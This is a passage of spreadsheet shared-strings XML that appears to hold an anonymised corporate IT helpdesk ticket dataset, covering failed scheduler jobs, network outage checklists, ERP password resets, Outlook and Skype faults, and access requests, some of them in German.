    <t xml:space="preserve">job Job_500 failed in job_scheduler at: 10/22/2016 06:08:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_500 failed in job_scheduler at: 10/22/2016 06:08:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1422 failed in job_scheduler at: 10/22/2016 05:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1422 failed in job_scheduler at: 10/22/2016 05:39:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/22/2016 04:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/22/2016 04:20:00</t>
  </si>
  <si>
    <t>power outage : engineering_toolkuznetsk warehouse, russia - (company) network is down since 2:48am et on 10/22/16</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________2:48am et on 10/22/16______________x000D_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___no_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____no______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</si>
  <si>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bkwin_infonet1_full failed in job_scheduler at: 10/22/2016 01:42:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_infonet1_full failed in job_scheduler at: 10/22/2016 01:42:00</t>
  </si>
  <si>
    <t xml:space="preserve">outlook not working </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dceoufyz.saufqkmd@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
my outlook app on my laptop isn't opening._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>HostName_1345 server: beeping sound in the server</t>
  </si>
  <si>
    <t>HostName_1345 server beeping sound in the server</t>
  </si>
  <si>
    <t>xpoqcrtb zwrypjqv</t>
  </si>
  <si>
    <t>ticket update on ticket_no0451791</t>
  </si>
  <si>
    <t>usa - (company):company-na-usa-usa-2950-core-sw02 went down at 5:51 pm et on 10/21.</t>
  </si>
  <si>
    <t xml:space="preserve">usa - (company):company-na-usa-usa-2950-core-sw02 went down at 5:51 pm et on 10/21._x000D_
gigabitethernet0/2 interface down on company-na-usa-usa-2950-core-sw02 ._x000D_
company-na-usa-usa-2950-access-sw01 went down at 7:44 pm et on 10/21,gigabitethernet1/1/4 interface down </t>
  </si>
  <si>
    <t xml:space="preserve">circuit outage:usa pa, company-ctc-dr-vpn-rtr.company.com went down at 6:10 pm et on 10/21. </t>
  </si>
  <si>
    <t>what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____ 6:10 pm et on 10/21_________________x000D_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</si>
  <si>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after my bios was update, i can no longer log in to erp</t>
  </si>
  <si>
    <t>i get an error every time that i try to log into erp i get a log balancing error 88. could not connect to message server</t>
  </si>
  <si>
    <t>ypetnhio ouhlpvig</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to erp </t>
  </si>
  <si>
    <t>ljodkepq dsifumxl</t>
  </si>
  <si>
    <t>unable to access etime through ie</t>
  </si>
  <si>
    <t>password prompt resulting in an unauthorized access error.</t>
  </si>
  <si>
    <t>yxsermtd vloueirh</t>
  </si>
  <si>
    <t>HostName_1325 has a drive that is flashing yellow. message display is also flashing on and off, although it has no error.</t>
  </si>
  <si>
    <t>please check HostName_1325  (shop_floor_app server) drive for possible problems. one of the drives is flashing yellow.</t>
  </si>
  <si>
    <t>zbhfrsto vhgtoxib</t>
  </si>
  <si>
    <t>usa and usa - perhaps other sites as well.  outlook refusing to send reply emails.</t>
  </si>
  <si>
    <t xml:space="preserve">usa and usa - perhaps other sites as well.  many users - outlook refusing to send reply emails.  a new email will send, but a reply will stall and outlook freezes with a not reponding error. this appears to be happening only with office 2010, i personally am using office 2016.  got many complaints from usa and complaints from usa mi as well. suspect a systemic problem company wide. </t>
  </si>
  <si>
    <t>slzhuipc sqntcber</t>
  </si>
  <si>
    <t xml:space="preserve">access denied : </t>
  </si>
  <si>
    <t xml:space="preserve">access denied : collaboration_platform
check screenshots in email attachment.
could you please reviewing the alejayhsdtffndro's profile on collaboration_platform? in the functions menu, alejayhsdtffndro chose the finance option but receive the message "access denied". alejayhsdtffndro's is controller in mexico. please see the screenshots below:
</t>
  </si>
  <si>
    <t>mxzcjhpi pnelahdw</t>
  </si>
  <si>
    <t xml:space="preserve">jpg files encrypted </t>
  </si>
  <si>
    <t>reset password</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bihfazru.bhjqvtzm@gmail.com
hello, i locked myself out of erp. can you reset my password?
thesdf sdlwfkvach
production supervisor
bihfazru.bhjqvtzm@gmail.com&lt;mailto:bihfazru.bhjqvtzm@gmail.com&gt;
[cid:image003.jpg@01cfcb3e.29ec32f0]
</t>
  </si>
  <si>
    <t>bihfazru bhjqvtzm</t>
  </si>
  <si>
    <t xml:space="preserve">terminated employees </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tsicojkp.kghaozew@gmail.com
there is an employee that has been terminated 9/30/16 who still has access to company email on his personal device, aylrbosw gaeycbwd.
tsicojkp kghaozew
commodity manager
tsicojkp.kghaozew@gmail.com&lt;mailto:tsicojkp.kghaozew@gmail.com&gt;
</t>
  </si>
  <si>
    <t>tsicojkp kghaozew</t>
  </si>
  <si>
    <t>outlook not working</t>
  </si>
  <si>
    <t>pxbzltkn fsediuyr</t>
  </si>
  <si>
    <t>unlocked and reset erp SID_1</t>
  </si>
  <si>
    <t>slkxgzdj wxpytevu</t>
  </si>
  <si>
    <t>company center not pulling replacement item</t>
  </si>
  <si>
    <t>company center is not pulling replacement items when they are available.  _x000D_
material 3976391 in company center is a pre-obsolete with replacement - the diaolog box is not displaying the replacement - vb13 is populated mm# 6984824_x000D_
.</t>
  </si>
  <si>
    <t>vbmzgsdk jdmyazti</t>
  </si>
  <si>
    <t>vip 1: erp account locked for user janhduh keehad8fvkgaalen</t>
  </si>
  <si>
    <t>lpoebzsc grknswyo</t>
  </si>
  <si>
    <t>outlook freezing for all users</t>
  </si>
  <si>
    <t>bdeplqyj fewovrcq</t>
  </si>
  <si>
    <t>outlook/crm plug in issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tskvmwag.awkrdqzb@gmail.com
hello,
crm plug in buttons are not staying checked when i close outlook. i lose the crm function in my outlook when i close the programdnty.
please see attached screen shot.
tskvmwag awkrdqzb
sr. sales engineer  nc3
north central region
tskvmwag.awkrdqzb@gmail.com&lt;mailto:tskvmwag.awkrdqzb@gmail.com&gt;
</t>
  </si>
  <si>
    <t>tskvmwag awkrdqzb</t>
  </si>
  <si>
    <t>printer prtqx4580 won't print for anyone in our office.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gqkedvzu.czoniyra@gmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>gqkedvzu czoniyra</t>
  </si>
  <si>
    <t>password error in erp</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ivohcdpw.ixcanwbm@gmail.com
dear sir,
please help me in erp login .
user id -dwivethn677
with best </t>
  </si>
  <si>
    <t>ivohcdpw ixcanwbm</t>
  </si>
  <si>
    <t>business partner id - bertsckaadyd122</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: inxsupmy.zhwmifvx@gmail.com
hello team,
can you please create a business partner id for â€“ bertsckaadyd122 in solution manager .
inxsupmy zhwmifvx
team lead -  (sourcing &amp; logistics) - global it
inxsupmy.zhwmifvx@gmail.com
</t>
  </si>
  <si>
    <t>inxsupmy zhwmifvx</t>
  </si>
  <si>
    <t>missed call</t>
  </si>
  <si>
    <t>id 04637</t>
  </si>
  <si>
    <t>id 04637 printer have paper stuck up issue.</t>
  </si>
  <si>
    <t>ongumpdz pjkrfmbc</t>
  </si>
  <si>
    <t>ms outlook network error messages</t>
  </si>
  <si>
    <t>when searching in inbox the following message is received due to current network conditions, some results may not be included in your search</t>
  </si>
  <si>
    <t>dctviemg muapxkns</t>
  </si>
  <si>
    <t>itslpwra vybdkuoa</t>
  </si>
  <si>
    <t>erp access issue</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34
enter user id of user having the issue: moranm
transaction code(s) the user needs or was working with: cv04n
describe the issue:
csr mdwydindy mwdlkloran currently does not have access to view drawings.  please upgrade her access as this is a necessary requirement for all csrs on the company team. 
provide access the same as this other user: yrlsguzk fasyiokl</t>
  </si>
  <si>
    <t>amunklhx bvrachko</t>
  </si>
  <si>
    <t>unable to open .xml files on the computer</t>
  </si>
  <si>
    <t>wbqtfzdv aectbluw</t>
  </si>
  <si>
    <t>skype problem</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gdnwlkit.jokidavy@gmail.com
yesterday i had some problems with outlook after a password change. the problem was crm. a new version was loaded and i thought my troubles were over
now, my skype for business is not working and i could not join an important meeting this morning. a copy of the skype screen is below. is the sign-in address correct? if not, what should it be. have emailed this because the telephone help line hangs up on you as soon as you select a number to direct the call.
[cid:image001.jpg@01d22b77.b8773b50]
tjwdhwdw tdlwdkunis
senior sales engineer team
gdnwlkit.jokidavy@gmail.com&lt;mailto:gdnwlkit.jokidavy@gmail.com&gt;
</t>
  </si>
  <si>
    <t>gdnwlkit jokidavy</t>
  </si>
  <si>
    <t>help line phone problem</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gdnwlkit.jokidavy@gmail.com
please note. when dialing into the help line, as soon as you make a selection (1,2, or 3) it hangs up on you , terminating the call.
tjwdhwdw tdlwdkunis
senior sales engineer teamgdnwlkit.jokidavy@gmail.com&lt;mailto:gdnwlkit.jokidavy@gmail.com&gt;
</t>
  </si>
  <si>
    <t>skype</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yiramdntyjqc.qtrcepsa@gmail.com_x000D_
_x000D_
hello,_x000D_
i am having trouble accessing skype. i keep getting cut-off when i select from the phone menu. hope this gets through._x000D_
</t>
  </si>
  <si>
    <t>yiramjqc qtrcepsa</t>
  </si>
  <si>
    <t>my pc don`t work with wifi</t>
  </si>
  <si>
    <t>_x000D_
i have wifi, but my computer does not work with wifi only works with telecom_vendor_4, telecom_vendor_4 it is a gsm suplier with g4</t>
  </si>
  <si>
    <t>syhmgdvf jqamflty</t>
  </si>
  <si>
    <t>information on previous tickets</t>
  </si>
  <si>
    <t>name:slrgconp onukdesq
language:
browser:microsoft internet explorer
email:slrgconp.onukdesq@gmail.com
customer number:
telephone:
summary:i opened a ticket this morning.  who is it assigned to</t>
  </si>
  <si>
    <t>email address in purchasing</t>
  </si>
  <si>
    <t xml:space="preserve">from: dpuifqeo eglwsfkn 
sent: friday, october 21, 2016 6:19 pm
to: nwfodmhc exurcwkm; shkdwd dlwdwd
cc: dfetvmzq brxavtzp
subject:  re: purchasing dfetvmzq brxavtzp 
the email address on this profile is incorrect â€“ please change to dfetvmzq.brxavtzp@gmail.com
also need to add the company catalog to her profile
</t>
  </si>
  <si>
    <t>dfetvmzq brxavtzp</t>
  </si>
  <si>
    <t>reset the password for jgxmafwk mlroijfp on erp / production / hcm</t>
  </si>
  <si>
    <t xml:space="preserve">i am new to erp and have had no training at all._x000D_
would you please call me and walk me through login? or at least verify my login name and password? please and </t>
  </si>
  <si>
    <t>jgxmafwk mlroijfp</t>
  </si>
  <si>
    <t xml:space="preserve">outlook indexing error </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: egjwxhlo.weofysln@gmail.com_x000D_
_x000D_
hello team,_x000D_
i used to be able to see what i search in outlook within pdf attachments, but after the upgrade i cannot search within pdf attachment in my mailbox._x000D_
can you please advise?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>egjwxhlo weofysln</t>
  </si>
  <si>
    <t>mreocsnk swoyxzma</t>
  </si>
  <si>
    <t>ethics login error</t>
  </si>
  <si>
    <t>when i try to login to ethics training, i click on the log in from the collaboration_platform site, it takes me to the page to select language, i click on engilsh. then i get an error that says the page failed to load.</t>
  </si>
  <si>
    <t>kiqfusgp xfzsreug</t>
  </si>
  <si>
    <t>old ticket no.inc1553707. usa access for configuring outlook exchange on windows phone</t>
  </si>
  <si>
    <t xml:space="preserve">usa access for configuring outlook exchange on windows phone. approval is attached with this ticket._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ytwmgpbk cpawsihk</t>
  </si>
  <si>
    <t>interface: gigabitethernet1/0/40 Â·shopfloor_111_schuette_01 on company-eu-deu-germany-emsw03-2960s-access-sw03 is down</t>
  </si>
  <si>
    <t xml:space="preserve">gigabitethernet1/0/40 Â· shopfloor_111_schuette_01 on company-eu-deu-germany-emsw03-2960s-access-sw03 is down since </t>
  </si>
  <si>
    <t>reset passwords for qkgnwxto dwtivjrp using password_management_tool password reset.</t>
  </si>
  <si>
    <t>cannot log into hiatchi password manager, to change to new password.</t>
  </si>
  <si>
    <t>qkgnwxto dwtivjrp</t>
  </si>
  <si>
    <t>password reset request.</t>
  </si>
  <si>
    <t>zymdwqsi jzvbthil</t>
  </si>
  <si>
    <t>my external monitor will not come on this morning.</t>
  </si>
  <si>
    <t>bcaxeuvh rgiqfavb</t>
  </si>
  <si>
    <t>delivery issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: acmglkti.cwgxrabu@gmail.com_x000D_
_x000D_
good morning_x000D_
_x000D_
we have urgent need for assistance as customer is awaiting parts for mm#7233365, please give this matheywter a high priority_x000D_
_x000D_
however,_x000D_
_x000D_
we have experienced a glitch in creating delivery for sales order#35045813.  the delivery #9169662470 created for 0 pcs., there is balance due of 195 pcs. , but we can not change delivery  quantity nor can we delete delivery.  we did not pgi the delivery when created, and the delivery is still showing in md04, but when we try to make changes there is an error that the delivery has been posted.  we have tried to unpost (vl19) delivery but we are getting message stating that delivery has already been inwarehouse_toold,  but in all reality the delivery is frozen in erp and no changes can be made._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>acmglkti cwgxrabu</t>
  </si>
  <si>
    <t xml:space="preserve">company.com not working : dns issue </t>
  </si>
  <si>
    <t>iqthfjvx qkpgrfzx</t>
  </si>
  <si>
    <t>customer catalogue and collaboration_tool is not working.</t>
  </si>
  <si>
    <t>unable to call in</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lomzfqns.htznsgdf@gmail.com_x000D_
_x000D_
fyi..._x000D_
_x000D_
tried calling in this morning. no matheywter which option i select, i'm immediately disconnected._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>lomzfqns htznsgdf</t>
  </si>
  <si>
    <t>access to netweaver</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: fgljepar.xpsarwiz@gmail.com
good morning,
please give yhrdw hdld3geman access to netweaver.
questions?
thanx123,
jwbsdd2 ddmefoche
sr. applications engineer
fgljepar.xpsarwiz@gmail.com&lt;mailto:fgljepar.xpsarwiz@gmail.com&gt;
</t>
  </si>
  <si>
    <t>lean tracker issues</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vtwxaefm.ljisafue@gmail.com
hello ,
i am getting error when trying to create a new lean tracker number. attached the screenshot of the error.
need your help to resolve it.
[cid:image002.jpg@01d22bc1.3d0d9af0]
</t>
  </si>
  <si>
    <t>vtwxaefm ljisafue</t>
  </si>
  <si>
    <t>shared mailbox not updating activities</t>
  </si>
  <si>
    <t>tqpbazxm jhbkycgd</t>
  </si>
  <si>
    <t>i cannot get into my computer, get an error no ip address</t>
  </si>
  <si>
    <t>wvqgbdhm fwchqjor</t>
  </si>
  <si>
    <t>would you please reset my erp hcm password? i'm locked out of it..thanks!</t>
  </si>
  <si>
    <t>would you please reset my erp hcm password? i'm locked out of it..</t>
  </si>
  <si>
    <t>qpkbiwzl urypnjvq</t>
  </si>
  <si>
    <t>outlook and skype not responding.</t>
  </si>
  <si>
    <t>ewvugfcy nxbdajgh</t>
  </si>
  <si>
    <t>drucker in lÃ¶we uacyltoe hxgayczeraum knicrhtyt papier \dtlmbcrx mwuateyx</t>
  </si>
  <si>
    <t>benÃ¶tige zugriff auf schichtplaner</t>
  </si>
  <si>
    <t xml:space="preserve">bitte zugriff auf folgenden pfad einrichten: departments (\\HostName_737)(m:) --&gt; programdntyme --&gt; schichtplaner
user: freybtrhsdl </t>
  </si>
  <si>
    <t>svelutaj nguzrmec</t>
  </si>
  <si>
    <t>HostName_113: plm plot / view (production_order_interface_app) rfcserver.exe process count(critical)</t>
  </si>
  <si>
    <t>password no more valid. new password to access to erp SID_34 erp production</t>
  </si>
  <si>
    <t>lpfzasmv cleoprzq</t>
  </si>
  <si>
    <t>reinstall hardcopy und EU_tool \lndypaqg dhqwtcsr</t>
  </si>
  <si>
    <t>lndypaqg dhqwtcsr</t>
  </si>
  <si>
    <t>help to install erp in computer lpawhdt8515494</t>
  </si>
  <si>
    <t xml:space="preserve">hi team,
could you please, help me to reinstall erp 7.40 in computer the an user. 
computer: lpawhdt8515494
please contatc me, if you have more doubt.
tnks
</t>
  </si>
  <si>
    <t xml:space="preserve"> expedite mm3516492 mm2405383</t>
  </si>
  <si>
    <t xml:space="preserve">hiï¼Œteam
pls. help to run out dn against sto#5019358024, 3516494*37pcs,customer need them urgently~
thx a lot!
b.rgds
wswdd.djdwol
company hardpoint apacc
</t>
  </si>
  <si>
    <t>wktesmbp lorjymef</t>
  </si>
  <si>
    <t>we111 gibt nur eine fehlermeldung aus</t>
  </si>
  <si>
    <t>we111 gibt nur eine fehlermeldung aus :_x000D_
anmelden im netzwerk_x000D_
registrieren der netzwerkeinstellungen._x000D_
nicht alle vorgÃ¤nge kÃ¶nnen erledigt werden._x000D_
warten sie einen moment \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>pc slow</t>
  </si>
  <si>
    <t>my pc is responding slow. can the pc team please check to speed it up further._x000D_
i am looking for disk fragmentation or similar type of activity which will help pc perform its activitiess faster.</t>
  </si>
  <si>
    <t>nrugzxkl lohqkvry</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/21/2016 05:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/21/2016 05:25:00</t>
  </si>
  <si>
    <t>trigger loads for bw - fill rate recovery-kba for oct 19th 2016</t>
  </si>
  <si>
    <t>lable drucker funktioniert nicht</t>
  </si>
  <si>
    <t>lable drucker in der endkontrolle defense gibt keine etiketten aus</t>
  </si>
  <si>
    <t>vpnraqfk pgocqjbu</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_biaprod failed in job_scheduler at: 10/21/2016 05:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_biaprod failed in job_scheduler at: 10/21/2016 05:12:00</t>
  </si>
  <si>
    <t>rechner fÃ¼r lÃ¤ngenmessmaschine uacyltoe hxgayczeen \xosdfhbu gtbfkisl</t>
  </si>
  <si>
    <t>xosdfhbu gtbfkisl</t>
  </si>
  <si>
    <t>pc name</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: koahsriq.wdugqatr@gmail.com
hello,
we need a new pc name
service tag of the pc is
fy80nkssc2
Ñ ÑƒÐ²Ð°Ð¶ÐµÐ½Ð¸ÐµÐ¼,
ÐµÐ²Ð³ÐµÐ½Ð¸Ñ.
koahsriq wdugqatr,
administrative assistant.
koahsriq.wdugqatr@gmail.com&lt;mailto:koahsriq.wdugqatr@gmail.com&gt;
company ooo | vavilova 5, corp.3 | russia, 119334 russia | www.company.com&lt;
</t>
  </si>
  <si>
    <t xml:space="preserve"> delivery unable to ship out delivery</t>
  </si>
  <si>
    <t xml:space="preserve">please provide the following: 
what order number? customer order nor. 35946436
what material or item number? item 10  mm 4846674
what warehouse location? plant_108
issue description / error message?  the delivery quantety is 33 the picked quantety is 31  delivery note is booked but system says delivery is not picked yet
can not cancel... please help </t>
  </si>
  <si>
    <t>cwrikael oanmsecr</t>
  </si>
  <si>
    <t>pw reset for erp  - user name: pihddltzr123</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: iboltufk.ezfnvcqp@gmail.com
erp SID_34 account has been not unlocked successfully â€“ pw reset for erp  - user name: pihddltzr123
"hi ,
unlocked the erp SID_34 account
please login with same password. -&gt; not working !!!!!
</t>
  </si>
  <si>
    <t>iboltufk ezfnvcqp</t>
  </si>
  <si>
    <t>kabel lan 10m liefern \gogtyekhan merdivan</t>
  </si>
  <si>
    <t>qidgvtwa qvbutayx</t>
  </si>
  <si>
    <t>netweaver</t>
  </si>
  <si>
    <t>cannot use it because of missing plugin</t>
  </si>
  <si>
    <t>rwhqabon gjxemiyp</t>
  </si>
  <si>
    <t>erp SID_34 response time too slow, transactions are being interrupted and erp connection is broken constantly</t>
  </si>
  <si>
    <t>transactions are interrupted and erp connection is broken, constantly</t>
  </si>
  <si>
    <t>ljynoupq zwlxjens</t>
  </si>
  <si>
    <t>please release access to \\HostName_705\teams\werkleitunggermany</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: byclpwmv.esafrtbh@gmail.com_x000D_
_x000D_
[cid:image001.jpg@01d22b85.01e698a0]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>byclpwmv esafrtbh</t>
  </si>
  <si>
    <t>pls release access to \\HostName_705\lean\</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: byclpwmv.esafrtbh@gmail.com_x000D_
_x000D_
[cid:image001.jpg@01d22b84.b25aac90]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>reminder email notification keeps on sending for the approved pr</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: izwtdnfq.xptuoaid@gmail.com_x000D_
_x000D_
hi it team,_x000D_
_x000D_
i have still received the email notification reminder to approve 2 prs daily for the ones which i have already approved and there are no any pending prs left to approve in me55. also, pos have been raised by purchasing team._x000D_
_x000D_
kindly review the system and fix for me. </t>
  </si>
  <si>
    <t>izwtdnfq xptuoaid</t>
  </si>
  <si>
    <t>slow erp</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tejahd.easdwmdwrappa@company.com
help,
erp is very slow with disconnections. please resolve at the earliest.
</t>
  </si>
  <si>
    <t>xqoljzbh aydcwkxt</t>
  </si>
  <si>
    <t>erp slow down. few locations impacted, at least EU</t>
  </si>
  <si>
    <t>backup fÃ¼r rechner  lasplant_119\pfjwinbg ljtzbdqg</t>
  </si>
  <si>
    <t>pfjwinbg ljtzbdqg</t>
  </si>
  <si>
    <t>log in for erp is out of order</t>
  </si>
  <si>
    <t>vncqjgzi tvalnycz</t>
  </si>
  <si>
    <t>pls. help to run out dn against sto#5019358024, 3516494*37pcs,customer need them urgently~</t>
  </si>
  <si>
    <t>EU_tool funktioniert nicht mehr (EU_tool is not working)</t>
  </si>
  <si>
    <t>EU_tool funktioniert nicht mehr</t>
  </si>
  <si>
    <t>*** urgent *** please reactive user id = dudyhuyv12</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: hupnceij.hyozjakb@gmail.com
hello all,
dudyhuyv12 is not active in password_management_tool, and australia can't access to windows â€¦
please can you check &amp; do what is necessary.
thx !
[cid:image001.png@01d22b78.8e2efe40]
sincÃ¨res salutations, best </t>
  </si>
  <si>
    <t>hupnceij hyozjakb</t>
  </si>
  <si>
    <t xml:space="preserve">unable to open eps files </t>
  </si>
  <si>
    <t>ckwfvyda saunmgqt</t>
  </si>
  <si>
    <t>netpath running from : HostName_1089 is having an issue reaching : portal.microsoftonline.com</t>
  </si>
  <si>
    <t>received solarwind alert 2:38 am on 10/21 et_x000D_
_x000D_
netpath running from : HostName_1089 is having an issue reaching : portal.microsoftonline.com_x000D_
_x000D_
attached is the screen shot</t>
  </si>
  <si>
    <t>pw reset for erp - user name piltzrnj567    thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iboltufk.ezfnvcqp@gmail.com_x000D_
_x000D_
Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / with best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2063 failed in job_scheduler at: 10/21/2016 02:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2063 failed in job_scheduler at: 10/21/2016 02:30:00</t>
  </si>
  <si>
    <t>collaboration_platform nicht verfÃ¼gbar - kein internetzugriff</t>
  </si>
  <si>
    <t>vdylwkbo hzlnrgat</t>
  </si>
  <si>
    <t>request authorization</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hkruyqfc.aouezihl@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
requesting you to provide me an authorization for the below mentioned programdnty._x000D_
_x000D_
[cid:image001.jpg@01d22b8f.406fc470]_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>hkruyqfc aouezihl</t>
  </si>
  <si>
    <t>bex error</t>
  </si>
  <si>
    <t xml:space="preserve">from: wgpimkle kijhcwur [mailto:wgpimkle.kijhcwur@gmail.com] _x000D_
sent: friday, october 21, 2016 6:27 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rad:bex error_x000D_
_x000D_
help desk_x000D_
_x000D_
_x000D_
i got below error message when i ran rrmx through SID_37._x000D_
please fix the issue._x000D_
</t>
  </si>
  <si>
    <t>wgpimkle kijhcwur</t>
  </si>
  <si>
    <t>EU_tool funktioniert nicht</t>
  </si>
  <si>
    <t>phedsjct lyphanue</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_search_server_prod_daily failed in job_scheduler at: 83.69.48.194 23:52:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_search_server_prod_daily failed in job_scheduler at: 83.69.48.194 23:52:00</t>
  </si>
  <si>
    <t>reinecker wzs 60 r 241 abteilung kentip</t>
  </si>
  <si>
    <t xml:space="preserve">pc fÃ¤hrt nach neustart nicht mehr hoch bzw. bricht wÃ¤hrend der hochfahrsequenz den bootvorgang ab, bitte Ã¼berprÃ¼fen, danke. </t>
  </si>
  <si>
    <t>jfteqgyc ncazxobk</t>
  </si>
  <si>
    <t>erp is too slow</t>
  </si>
  <si>
    <t xml:space="preserve">name:zheqafyo bqirpxag
language:
browser:microsoft internet explorer
email:cowsvzel.ryhkefwv@gmail.com
customer number:
telephone:
summary:erp is too slow 
</t>
  </si>
  <si>
    <t>cowsvzel ryhkefwv</t>
  </si>
  <si>
    <t>users from various department are complaining slow response in erp, engineering tool, engineering tool, etc.</t>
  </si>
  <si>
    <t>users from various department are complaining slow response in erp, engineering tool, engineering tool, etc. &amp; unable to work.</t>
  </si>
  <si>
    <t>ythucdjx mujfrsyl</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3052 failed in job_scheduler at: 83.69.48.194 23:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3052 failed in job_scheduler at: 83.69.48.194 23:31:00</t>
  </si>
  <si>
    <t>circuit  outage:usa plant - (company) secondary vpn is down since 11:08 pm on 10/20 et.site up on primary global_telecom_1</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________11:08 pm on 10/20 et______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? __na_____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___yes_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _____na____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _______na____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______na_____    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ____yes___     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  _____na___     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>erp SID_34 system down</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi 
plant_298 encounter erp SID_34 system down, due to this issue we may or may not able to fulfill (local) orders for today it depend on how fast the system will be up.
i have raise it ticket inc1562584.
nsdwd mwdddlleh
operation supervisor
company distribution services of asia pte ltd
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">unable to check pay slip in hr_tool </t>
  </si>
  <si>
    <t>gbirhjat fptbrhwv</t>
  </si>
  <si>
    <t>erpå¯†ç å¿˜è®° id: fenthgh45  erp password was forgotten</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jmxqhrfa.vawptbfl@gmail.com
æ‚¨å¥½ï¼Œit
               erpå¯†ç å¿˜è®° id: fenthgh45  erp password was forgotten
